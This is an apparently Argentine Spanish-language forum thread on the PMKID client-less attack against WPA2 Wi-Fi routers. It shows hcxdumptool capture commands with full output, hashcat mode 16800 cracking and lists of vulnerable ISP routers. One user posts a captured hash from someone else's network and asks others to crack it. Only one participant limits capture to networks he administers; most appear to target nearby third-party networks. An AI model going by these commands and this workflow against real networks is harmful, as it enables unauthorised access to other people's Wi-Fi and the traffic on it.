Hashcat -m 16800 ataque WPA2 sin clientes via PMKID

[superhache]

Hola Gente!
Encontré este nuevo metodo (1 mes) que se puede obtener un simil .cap sin que el router tenga clientes asosiados !

Funciona en ciertas condiciones, pero me ha tocado mas de una vez casos donde me quedo chequeando cada rato cierto AP hasta que alguien se conecte, y bueno,  ahora si el AP es vulnerable a este ataque, ya no tengo que esperar a un cliente q se conecte para deautenticarlo.

Funciona mediante la extraccion de PMKID, y vuelvo a decir solo funciona con algunos router nuevos , vulnerables y de todos modos hay q pasarle un diccionario a la captura obtenida.Supongo que servira para Fibertel speedy, digamos redes con patrones, y en cuando a velocidad , el hashcat me corre a la misma velocidad que para -m 2500.

Particularmente lo he probado y funciona, y para que tengan una idea de cuan vulnerables son los routers, de mis 20 redes que detecto, 4 de ellas son vulnerables.

Les dejo el link con toda la info.

Saludos


Link Original
You are not allowed to view links. Register or Login

Traducido al español por google (pero ojo que traduce hasta los comandos)
You are not allowed to view links. Register or Login

Mas info
You are not allowed to view links. Register or Login

[GustavocAr]

Tenes idea si se puede hacer desde wifislax? podras hacer algun tuto en youtube? gracias por la info!

[adriangm]

podras hacer algun tuto en youtube?

El video no es de mi autoría y lo podes hacer con cualquier distro de Linux.

[h4x0r]

los routers de fibra optica de movistar son vulnerables, se puede sacar el pmkid sin cliente.

[GustavocAr]

Saque esta tarde uno de speedy fibra Con este metodo

[GustavocAr]

Saque esta tarde uno de speedy fibra Con este metodo

Dejo la captura por si alguno me da una mano! le pase 8,9 y 10 digitos y nada!

You are not allowed to view links. Register or Login

[MaD_MaX]

Pregunto sin saber, La velocidad de bruteforce debe ser la misma que con los que se hacen con -m 2600?

[adriangm]

Pregunto sin saber, La velocidad de bruteforce debe ser la misma que con los que se hacen con -m 2600?

La velocidad es la misma, eso no cambia, la ventaja de éste ataque es que no hace falta un cliente conectado para obtener la información.

[superhache]

Hola, les cuento 2 cosas a tener en cuenta.
una es que la página para subir los caps,
You are not allowed to view links. Register or Login
ya toma estos nuevos archivos con PMKID!! excelente! jeje

y la otra es que a la hora de correr el hcxdumtool me genera demasiada data,
y probando la opcion --enable_status
descubrí que con --enable_staus 1 , obtengo justo lo que quiero , que solo me muestre cuando detecta un PMKID!

este el comando:

hcxdumptool -i wls35u1 -o hashes -c 11 --enable_status 1

su respuesta:

start capturing (stop with ctrl+c)
INTERFACE:...............: wls35u1
FILTERLIST...............: 0 entries
MAC CLIENT...............: 4c123bb5ce90 (client)
MAC ACCESS POINT.........: a145bc9935f0 (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64752
ANONCE...................: 19cebc16a9a3b3606f160ae6b33d7187ba5a99a59563be19b8bc7621e524d2fe

[12:02:28 - 011] a130485f4a9d -> d43da44ebb4a [FOUND PMKID]
[12:02:29 - 011] 010143432bf7 -> acc53b6c2443 [FOUND PMKID CLIENT-LESS]
[12:02:32 - 011] bb443696f444 -> 58bbcc9fe7d3 [FOUND PMKID]
[12:02:32 - 011] bb443696f444 -> 58bbcc9fe7d3 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 12304]
INFO: cha=11, rx=408897, rx(dropped)=37319, tx=7896, powned=17, err=0^C
terminated...
[root@antergos Escritorio]#

apenas tengan el PMKID que buscan lo cortan y listo.
saludos!

[MaD_MaX]

No lo habia corrido mucho pero era sierto que el status no se veia.
Util el aprote.
en 24 horas creo que me genero un archivo cap de 30 megas.
Y como no veia el resultado ni me fije que tenia.

[GustavocAr]

Dejo uno,por si alguno me da una mano:

4fd27497155a843c6e892711cd62526f*d8fb5e548c56*fcc233ff256a*476973656c61

[MaD_MaX]

Le falta arreglos a la herramienta todavia o a mi:

root@raspberrypi:~# cat pi.filter
B82xxxxx49B
C83xxxxE3E0
247xxxx40E
root@raspberrypi:~# hcxdumptool -i wlan1mon -c 1,6 --enable_status 1 --filterlist pi.filter -o pmkid

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 3 entries
MAC CLIENT...............: fccxxxx7be (client)
MAC ACCESS POINT.........: 580xxxxc51e (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63851
ANONCE...................: 461906e4b9dc2df823c8e3e345688e5d61e926e1bda8477f85107c0fac356cf2

[00:11:52 - 001] 8c8xxx9122 -> fcbxxxxx8ac [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6293]
[00:11:54 - 006] 88xxx966b8 -> f86xxxx249 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 3259]
[00:11:54 - 006] 305xxx8337 -> 007xxx1e4 [EAPOL 4/4 - M4 RETRY ATTACK]
[00:11:57 - 006] 007xxx1e4 -> 3052xxx337 [FOUND PMKID]
[00:11:58 - 006] 007xxx91e4 -> c0dxxx8736 [FOUND PMKID]

pi.filter tiene las 3 mac's de las 3 redes que administro.
Entonces PQ: MAC ACCESS POINT.........: 580943ccc51e (start NIC)
No respeta el filtro?
"--filterlist=<file>                : mac filter list"

Seguramente habra mejoras pronto.
despues lo chusmeare mas a fondo.

[Supehache]

Le falta arreglos a la herramienta todavia o a mi:

pi.filter tiene las 3 mac's de las 3 redes que administro.
Entonces PQ: MAC ACCESS POINT.........: 580943ccc51e (start NIC)
No respeta el filtro?
"--filterlist=<file>                : mac filter list"

Seguramente habra mejoras pronto.
despues lo chusmeare mas a fondo.

Hola
aunque yo también tengo problemas con el filtro,
y a mi no me ha funcionado con el parametro --filtermode
y no se si fue intencional pero veo que te faltó ponerlo, sería así
--filtermode 1 es el default  ignora las mac en la lista
--filtermode 2  solo captura sobre las mac en la lista
y sino a esperar que arreglen a herramienta   

[MaD_MaX]

Ahi andubo con el -filtermode 2. Gracias.
Las 4 redes que probe no son vulnerables.

[MaD_MaX]

Script de automatizacion.
You are not allowed to view links. Register or Login